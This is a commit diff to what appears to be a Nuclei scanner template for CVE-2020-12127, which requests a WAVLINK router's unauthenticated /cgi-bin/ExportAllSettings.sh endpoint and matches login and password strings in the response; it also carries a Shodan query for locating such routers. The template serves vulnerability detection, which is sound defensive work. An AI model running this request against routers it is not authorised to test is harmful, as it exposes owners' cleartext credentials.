Update CVE-2020-12127.yaml

patch-1
Ritik Chaddha 2022-08-15 11:27:19 +05:30 committed by GitHub
parent df3cf03c10
commit 87cc7a92f5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 17 additions and 16 deletions

View File

@ -7,29 +7,30 @@ info:
description: | description: |
An information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication. An information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication.
reference: reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12127 - https://nvd.nist.gov/vuln/detail/CVE-2020-12127
- https://cerne.xyz/bugs/CVE-2020-12127 classification:
cve-id: CVE-2020-12127
metadata: metadata:
verified: true
shodan-query: http.html:"Wavlink" shodan-query: http.html:"Wavlink"
verified: "true" tags: cve,cve2020,wavlink,exposure
tags: access,control,cve,2020
requests: requests:
- raw: - method: GET
- | path:
GET /cgi-bin/ExportAllSettings.sh HTTP/1.1 - "{{BaseURL}}/cgi-bin/ExportAllSettings.sh"
Host: {{Hostname}}
redirects: true
max-redirects: 2
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word
part: body
words:
- 'Login='
- 'Password='
- 'Model='
- 'AuthMode='
condition: and
- type: status - type: status
status: status:
- 200 - 200
- type: word
words:
- 'Login'
- 'Password'
- 'AuthMode'